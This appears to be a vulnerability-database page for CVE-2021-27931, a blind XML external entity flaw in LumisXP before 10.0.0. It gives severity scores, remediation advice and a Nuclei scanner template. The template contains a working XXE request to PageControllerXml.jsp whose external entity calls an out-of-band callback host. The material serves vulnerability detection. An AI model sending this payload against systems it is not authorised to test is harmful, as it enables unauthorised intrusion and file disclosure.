Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27931
HistoryNov 25, 2021 - 3:39 p.m.

LumisXP <10.0.0 - Blind XML External Entity Attack

2021-11-2515:39:09
ProjectDiscovery
github.com
9

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

9 High

AI Score

Confidence

High

0.574 Medium

EPSS

Percentile

97.7%

LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.

id: CVE-2021-27931

info:
  name: LumisXP <10.0.0 - Blind XML External Entity Attack
  author: alph4byt3
  severity: critical
  description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server compromise, or further attacks on internal systems.
  remediation: |
    Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability.
  reference:
    - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27931
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-27931
    cwe-id: CWE-611
    epss-score: 0.60102
    epss-percentile: 0.97771
    cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lumis
    product: lumis_experience_platform
  tags: cve2021,cve,lumis,xxe,oast,blind

http:
  - raw:
      - |
        POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0" ?>
        <!DOCTYPE r [
        <!ELEMENT r ANY >
        <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <method name="addPage">
        <id>&xxe;</id>
        </method>

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a004830460221008b7b1482c51b891f719a691f34c8f18c1b22e51f7767abd5de84aaddb042f352022100e59e7bd6c6eea0222eab89ab3871c6c3b1705b428f0ef77e9c226ae77b8cd0fa:922c64590222798bb761d5b6d8e72950

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

9 High

AI Score

Confidence

High

0.574 Medium

EPSS

Percentile

97.7%

Related for NUCLEI:CVE-2021-27931